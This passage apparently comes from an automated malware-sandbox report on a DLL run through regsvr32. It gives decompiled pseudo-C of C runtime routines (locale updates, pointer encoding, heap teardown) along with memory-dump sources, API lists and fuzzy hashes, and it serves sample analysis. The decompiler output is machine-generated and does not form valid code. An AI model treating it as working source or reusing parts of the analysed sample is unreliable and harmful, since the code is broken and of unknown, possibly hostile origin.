                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				__rax = _v32;
                                                                                                                                            				__eax =  *(__rax + 1) & 0x000000ff;
                                                                                                                                            				if (_v72 - ( *(__rax + 1) & 0x000000ff) > 0) goto 0x65cfa37a;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				__rcx = _a16;
                                                                                                                                            				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000004;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				__rdx = _a16;
                                                                                                                                            				 *((char*)(_a16 + __rcx + 0x1c)) = __al;
                                                                                                                                            				goto 0x65cfa333;
                                                                                                                                            				goto 0x65cfa2fe;
                                                                                                                                            				_v72 = 1;
                                                                                                                                            				goto 0x65cfa390;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				if (_v72 - 0xff >= 0) goto 0x65cfa3c8;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				__rcx = _a16;
                                                                                                                                            				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000008;
                                                                                                                                            				_v72 = _v72 + 1;
                                                                                                                                            				__rdx = _a16;
                                                                                                                                            				 *((char*)(_a16 + __rcx + 0x1c)) = __al;
                                                                                                                                            				goto 0x65cfa386;
                                                                                                                                            				__rax = _a16;
                                                                                                                                            				__ecx =  *(_a16 + 4);
                                                                                                                                            				__eax = E00007FFC7FFC65CFA480( *(_a16 + 4));
                                                                                                                                            				__rcx = _a16;
                                                                                                                                            				 *(_a16 + 0xc) = __eax;
                                                                                                                                            				__rax = _a16;
                                                                                                                                            				 *((intOrPtr*)(_a16 + 8)) = 1;
                                                                                                                                            				goto 0x65cfa403;
                                                                                                                                            				__rax = _a16;
                                                                                                                                            				 *(__rax + 8) = 0;
                                                                                                                                            				_v88 = 0;
                                                                                                                                            				goto 0x65cfa417;
                                                                                                                                            				_v88 = _v88 + 1;
                                                                                                                                            				_v88 = _v88 + 1;
                                                                                                                                            				if (_v88 - 6 >= 0) goto 0x65cfa433;
                                                                                                                                            				__eax = _v88;
                                                                                                                                            				__ecx = 0;
                                                                                                                                            				__rdx = _a16;
                                                                                                                                            				 *((short*)(_a16 + 0x10 + __rax * 2)) = __cx;
                                                                                                                                            				goto 0x65cfa40d;
                                                                                                                                            				__rcx = _a16;
                                                                                                                                            				__eax = E00007FFC7FFC65CFA5E0(_a16); // executed
                                                                                                                                            				__eax = 0;
                                                                                                                                            				goto 0x65cfa463;
                                                                                                                                            				if ( *0x65d1cd68 == 0) goto 0x65cfa45e;
                                                                                                                                            				__rcx = _a16;
                                                                                                                                            				E00007FFC7FFC65CFA4E0(_a16) = 0;
                                                                                                                                            				goto 0x65cfa463;
                                                                                                                                            				__eax = 0xffffffff;
                                                                                                                                            				__rcx = _v24;
                                                                                                                                            				__rcx = _v24 ^ __rsp;
                                                                                                                                            				return E00007FFC7FFC65CF3280(0xffffffff, __ecx, __edx, _v24 ^ __rsp, __rdx, __r8);
                                                                                                                                            			}


















                                                                                                                                            0x7ffc65cfa000
                                                                                                                                            0x7ffc65cfa005
                                                                                                                                            0x7ffc65cfa00d
                                                                                                                                            0x7ffc65cfa014
                                                                                                                                            0x7ffc65cfa017
                                                                                                                                            0x7ffc65cfa028
                                                                                                                                            0x7ffc65cfa037
                                                                                                                                            0x7ffc65cfa041
                                                                                                                                            0x7ffc65cfa048
                                                                                                                                            0x7ffc65cfa04d
                                                                                                                                            0x7ffc65cfa05d
                                                                                                                                            0x7ffc65cfa069
                                                                                                                                            0x7ffc65cfa073
                                                                                                                                            0x7ffc65cfa088
                                                                                                                                            0x7ffc65cfa08e
                                                                                                                                            0x7ffc65cfa096
                                                                                                                                            0x7ffc65cfa09e
                                                                                                                                            0x7ffc65cfa0aa
                                                                                                                                            0x7ffc65cfa0b8
                                                                                                                                            0x7ffc65cfa0bd
                                                                                                                                            0x7ffc65cfa0bf
                                                                                                                                            0x7ffc65cfa0c7
                                                                                                                                            0x7ffc65cfa0cf
                                                                                                                                            0x7ffc65cfa0d8
                                                                                                                                            0x7ffc65cfa0fc
                                                                                                                                            0x7ffc65cfa101
                                                                                                                                            0x7ffc65cfa10c
                                                                                                                                            0x7ffc65cfa11b
                                                                                                                                            0x7ffc65cfa128
                                                                                                                                            0x7ffc65cfa132
                                                                                                                                            0x7ffc65cfa136
                                                                                                                                            0x7ffc65cfa13e
                                                                                                                                            0x7ffc65cfa142
                                                                                                                                            0x7ffc65cfa14f
                                                                                                                                            0x7ffc65cfa17f
                                                                                                                                            0x7ffc65cfa187
                                                                                                                                            0x7ffc65cfa18b
                                                                                                                                            0x7ffc65cfa18d
                                                                                                                                            0x7ffc65cfa192
                                                                                                                                            0x7ffc65cfa1a6
                                                                                                                                            0x7ffc65cfa1b1
                                                                                                                                            0x7ffc65cfa1b8
                                                                                                                                            0x7ffc65cfa1d0
                                                                                                                                            0x7ffc65cfa1d3
                                                                                                                                            0x7ffc65cfa1db
                                                                                                                                            0x7ffc65cfa1e3
                                                                                                                                            0x7ffc65cfa1ec
                                                                                                                                            0x7ffc65cfa200
                                                                                                                                            0x7ffc65cfa218
                                                                                                                                            0x7ffc65cfa21e
                                                                                                                                            0x7ffc65cfa228
                                                                                                                                            0x7ffc65cfa22f
                                                                                                                                            0x7ffc65cfa234
                                                                                                                                            0x7ffc65cfa241
                                                                                                                                            0x7ffc65cfa24e
                                                                                                                                            0x7ffc65cfa25b
                                                                                                                                            0x7ffc65cfa25d
                                                                                                                                            0x7ffc65cfa265
                                                                                                                                            0x7ffc65cfa26f
                                                                                                                                            0x7ffc65cfa271
                                                                                                                                            0x7ffc65cfa276
                                                                                                                                            0x7ffc65cfa27b
                                                                                                                                            0x7ffc65cfa280
                                                                                                                                            0x7ffc65cfa28f
                                                                                                                                            0x7ffc65cfa295
                                                                                                                                            0x7ffc65cfa29d
                                                                                                                                            0x7ffc65cfa2a3
                                                                                                                                            0x7ffc65cfa2a5
                                                                                                                                            0x7ffc65cfa2b1
                                                                                                                                            0x7ffc65cfa2b3
                                                                                                                                            0x7ffc65cfa2b7
                                                                                                                                            0x7ffc65cfa2bf
                                                                                                                                            0x7ffc65cfa2c4
                                                                                                                                            0x7ffc65cfa2c6
                                                                                                                                            0x7ffc65cfa2ce
                                                                                                                                            0x7ffc65cfa2d5
                                                                                                                                            0x7ffc65cfa2d8
                                                                                                                                            0x7ffc65cfa2e0
                                                                                                                                            0x7ffc65cfa2ec
                                                                                                                                            0x7ffc65cfa2f2
                                                                                                                                            0x7ffc65cfa2f7
                                                                                                                                            0x7ffc65cfa2fc
                                                                                                                                            0x7ffc65cfa303
                                                                                                                                            0x7ffc65cfa307
                                                                                                                                            0x7ffc65cfa30c
                                                                                                                                            0x7ffc65cfa311
                                                                                                                                            0x7ffc65cfa316
                                                                                                                                            0x7ffc65cfa318
                                                                                                                                            0x7ffc65cfa31d
                                                                                                                                            0x7ffc65cfa323
                                                                                                                                            0x7ffc65cfa325
                                                                                                                                            0x7ffc65cfa32a
                                                                                                                                            0x7ffc65cfa32d
                                                                                                                                            0x7ffc65cfa331
                                                                                                                                            0x7ffc65cfa337
                                                                                                                                            0x7ffc65cfa339
                                                                                                                                            0x7ffc65cfa33d
                                                                                                                                            0x7ffc65cfa342
                                                                                                                                            0x7ffc65cfa34a
                                                                                                                                            0x7ffc65cfa350
                                                                                                                                            0x7ffc65cfa354
                                                                                                                                            0x7ffc65cfa361
                                                                                                                                            0x7ffc65cfa368
                                                                                                                                            0x7ffc65cfa36c
                                                                                                                                            0x7ffc65cfa374
                                                                                                                                            0x7ffc65cfa378
                                                                                                                                            0x7ffc65cfa37a
                                                                                                                                            0x7ffc65cfa37c
                                                                                                                                            0x7ffc65cfa384
                                                                                                                                            0x7ffc65cfa38a
                                                                                                                                            0x7ffc65cfa38c
                                                                                                                                            0x7ffc65cfa398
                                                                                                                                            0x7ffc65cfa39e
                                                                                                                                            0x7ffc65cfa3a2
                                                                                                                                            0x7ffc65cfa3af
                                                                                                                                            0x7ffc65cfa3b6
                                                                                                                                            0x7ffc65cfa3ba
                                                                                                                                            0x7ffc65cfa3c2
                                                                                                                                            0x7ffc65cfa3c6
                                                                                                                                            0x7ffc65cfa3c8
                                                                                                                                            0x7ffc65cfa3d0
                                                                                                                                            0x7ffc65cfa3d3
                                                                                                                                            0x7ffc65cfa3d8
                                                                                                                                            0x7ffc65cfa3e0
                                                                                                                                            0x7ffc65cfa3e3
                                                                                                                                            0x7ffc65cfa3eb
                                                                                                                                            0x7ffc65cfa3f2
                                                                                                                                            0x7ffc65cfa3f4
                                                                                                                                            0x7ffc65cfa3fc
                                                                                                                                            0x7ffc65cfa403
                                                                                                                                            0x7ffc65cfa40b
                                                                                                                                            0x7ffc65cfa411
                                                                                                                                            0x7ffc65cfa413
                                                                                                                                            0x7ffc65cfa41c
                                                                                                                                            0x7ffc65cfa41e
                                                                                                                                            0x7ffc65cfa422
                                                                                                                                            0x7ffc65cfa424
                                                                                                                                            0x7ffc65cfa42c
                                                                                                                                            0x7ffc65cfa431
                                                                                                                                            0x7ffc65cfa433
                                                                                                                                            0x7ffc65cfa43b
                                                                                                                                            0x7ffc65cfa440
                                                                                                                                            0x7ffc65cfa442
                                                                                                                                            0x7ffc65cfa44b
                                                                                                                                            0x7ffc65cfa44d
                                                                                                                                            0x7ffc65cfa45a
                                                                                                                                            0x7ffc65cfa45c
                                                                                                                                            0x7ffc65cfa45e
                                                                                                                                            0x7ffc65cfa463
                                                                                                                                            0x7ffc65cfa468
                                                                                                                                            0x7ffc65cfa474

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1901436342-0
                                                                                                                                            • Opcode ID: bd1aa9bb27f65b33b611181b282d42369fc0b805d559ad423015dd3100174c74
                                                                                                                                            • Instruction ID: 7c8273395b30ea07a08cb6375865a95ff7c8bc65c689ffde9c6e92e0ef680eb3
                                                                                                                                            • Opcode Fuzzy Hash: bd1aa9bb27f65b33b611181b282d42369fc0b805d559ad423015dd3100174c74
                                                                                                                                            • Instruction Fuzzy Hash: D1D12C3261C695DAD7A4CF15E88022AB7A0FBC8B44F609535EACE83798DF2DD445CF10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                            			E00007FFC7FFC65CF7540(long long __rax) {
                                                                                                                                            				long long _v24;
                                                                                                                                            				void* _t8;
                                                                                                                                            				void* _t9;
                                                                                                                                            
                                                                                                                                            				_t16 = __rax;
                                                                                                                                            				_t9 = E00007FFC7FFC65CF3D00(_t8); // executed
                                                                                                                                            				_v24 = __rax;
                                                                                                                                            				return E00007FFC7FFC65CFCF20(E00007FFC7FFC65CFCFB0(E00007FFC7FFC65CFD450(E00007FFC7FFC65CFD470(E00007FFC7FFC65CFBD50(E00007FFC7FFC65CFAB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                                                                                                                            			}






                                                                                                                                            0x7ffc65cf7540
                                                                                                                                            0x7ffc65cf7544
                                                                                                                                            0x7ffc65cf7549
                                                                                                                                            0x7ffc65cf758e

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00007FFC65CF3D00: RtlEncodePointer.NTDLL ref: 00007FFC65CF3D06
                                                                                                                                            • _initp_misc_winsig.LIBCMTD ref: 00007FFC65CF757B
                                                                                                                                            • _initp_eh_hooks.LIBCMTD ref: 00007FFC65CF7585
                                                                                                                                              • Part of subcall function 00007FFC65CFCF20: EncodePointer.KERNEL32(?,?,?,?,00007FFC65CF758A,?,?,?,?,?,?,00007FFC65CF3D39), ref: 00007FFC65CFCF30
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2678799220-0
                                                                                                                                            • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                                                                                            • Instruction ID: 04fdc0c4c5264c0857ef0d90c6bf4848c9218b1e00960f0ee5cad4fe80d33783
                                                                                                                                            • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                                                                                            • Instruction Fuzzy Hash: A8E05967A2C495E2D620BF11E85206A9730FFCCF48F100531F6CD4A67BCE1DE500CA50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess$AllocateHeap__crt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4215626177-0
                                                                                                                                            • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                                                                                            • Instruction ID: 8e27c3bab1b0ea2c9aa256c0d6636a05d6ba3e591e05cea66ccb52b1ec7acb1f
                                                                                                                                            • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                                                                                            • Instruction Fuzzy Hash: 18E04F2690C9AAD2E7349B55E8003796260FFC8B48F640835D64E026E5CF2FD450D620
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                            			E00007FFC7FFC65CF4399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                                                                                                            
                                                                                                                                            				_a48 = __rax;
                                                                                                                                            				if (_a48 == 0) goto 0x65cf43ad;
                                                                                                                                            				goto 0x65cf43f5;
                                                                                                                                            				if (_a88 != 0) goto 0x65cf43ce;
                                                                                                                                            				if (_a120 == 0) goto 0x65cf43c7;
                                                                                                                                            				 *_a120 = 0xc;
                                                                                                                                            				goto 0x65cf43f5;
                                                                                                                                            				if (E00007FFC7FFC65CFABB0(_a48, _a80) != 0) goto 0x65cf43f3;
                                                                                                                                            				if (_a120 == 0) goto 0x65cf43ef;
                                                                                                                                            				 *_a120 = 0xc;
                                                                                                                                            				goto 0x65cf43f5;
                                                                                                                                            				goto 0x65cf4377;
                                                                                                                                            				return 0;
                                                                                                                                            			}



                                                                                                                                            0x7ffc65cf4399
                                                                                                                                            0x7ffc65cf43a4
                                                                                                                                            0x7ffc65cf43ab
                                                                                                                                            0x7ffc65cf43b2
                                                                                                                                            0x7ffc65cf43ba
                                                                                                                                            0x7ffc65cf43c1
                                                                                                                                            0x7ffc65cf43cc
                                                                                                                                            0x7ffc65cf43da
                                                                                                                                            0x7ffc65cf43e2
                                                                                                                                            0x7ffc65cf43e9
                                                                                                                                            0x7ffc65cf43f1
                                                                                                                                            0x7ffc65cf43f3
                                                                                                                                            0x7ffc65cf43f9

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                                                                                            • Instruction ID: c8a71da0ca8816be039f8861543528f08f35d9e7b1fc62da6041b32ada01269f
                                                                                                                                            • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                                                                                            • Instruction Fuzzy Hash: 7701F73351C759D2F6548E15E58072AA7A0FB88B94F202531EBCD42BA8DF7DE448CA10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$ByteCharMultiUpdateUpdate::~_Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2569699860-0
                                                                                                                                            • Opcode ID: 0c57b3b436687e78039d68963cfd06a068c3edb785e51800680b91c9a9ce0a07
                                                                                                                                            • Instruction ID: a34b4e4cff903c364c821c95003b294a351739ee48806066526f733da0fd5908
                                                                                                                                            • Opcode Fuzzy Hash: 0c57b3b436687e78039d68963cfd06a068c3edb785e51800680b91c9a9ce0a07
                                                                                                                                            • Instruction Fuzzy Hash: FD01BC72A1C6C49AC760DF10F08069ABB61FBC9784F60412AEACD83B59CB38D544CF40
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _ioterm
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4163092671-0
                                                                                                                                            • Opcode ID: c4661e6c861f00f368b387c53bfc5a2878f93a0c021545087ea26df979c33d88
                                                                                                                                            • Instruction ID: a50b340e6367ad80a7a92d06d33e7feeed8a5520cc5f1f6c046403deb405185d
                                                                                                                                            • Opcode Fuzzy Hash: c4661e6c861f00f368b387c53bfc5a2878f93a0c021545087ea26df979c33d88
                                                                                                                                            • Instruction Fuzzy Hash: D0F0AF62C4C13EF9F665AF64D5093782990AF58F91F701E34E01D811E69E6EA844CA32
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _ioterm.LIBCMTD ref: 00007FFC65CF3437
                                                                                                                                              • Part of subcall function 00007FFC65CF7D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC65CF343C), ref: 00007FFC65CF7D93
                                                                                                                                              • Part of subcall function 00007FFC65CF3E00: FlsFree.KERNEL32 ref: 00007FFC65CF3E13
                                                                                                                                              • Part of subcall function 00007FFC65CF3E00: _mtdeletelocks.LIBCMTD ref: 00007FFC65CF3E23
                                                                                                                                              • Part of subcall function 00007FFC65CF88D0: HeapDestroy.KERNELBASE ref: 00007FFC65CF88DB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1508997487-0
                                                                                                                                            • Opcode ID: 8c7cd16c52d3f74447f8a2e4d1e0973512220e22c4a7d0e47614c04d6d0045ae
                                                                                                                                            • Instruction ID: 96bfb61cbbb6d807e59e6dd69b40d2d1d45887efdd23f652e6aa1c136fc68dd8
                                                                                                                                            • Opcode Fuzzy Hash: 8c7cd16c52d3f74447f8a2e4d1e0973512220e22c4a7d0e47614c04d6d0045ae
                                                                                                                                            • Instruction Fuzzy Hash: CBE0E262E0C02FFAF615AB60D9022B915809F48FC2FB00C30F00E812E6EE4FA800C272
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DestroyHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2435110975-0
                                                                                                                                            • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                                                                                            • Instruction ID: 99111d882ac934d98c6e5cc056d07f36c7573ebfbe322c64d3db4fd8a5ed4d23
                                                                                                                                            • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                                                                                            • Instruction Fuzzy Hash: DBC04C68D1DA15C1E6189752FF8532422306B95B06FA00830C50D412B08E2D55A6C710
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EncodePointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2118026453-0
                                                                                                                                            • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                                                                                            • Instruction ID: c37e456cf5c0e3bcc835584a60af4573e5dc2fda50b0874ca38f23b0412128fa
                                                                                                                                            • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                                                                                            • Instruction Fuzzy Hash: 86A00124E1A5A5D6DA6C37369D9602911206B59A09EE01969C60F40291CD2E92EA8A14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
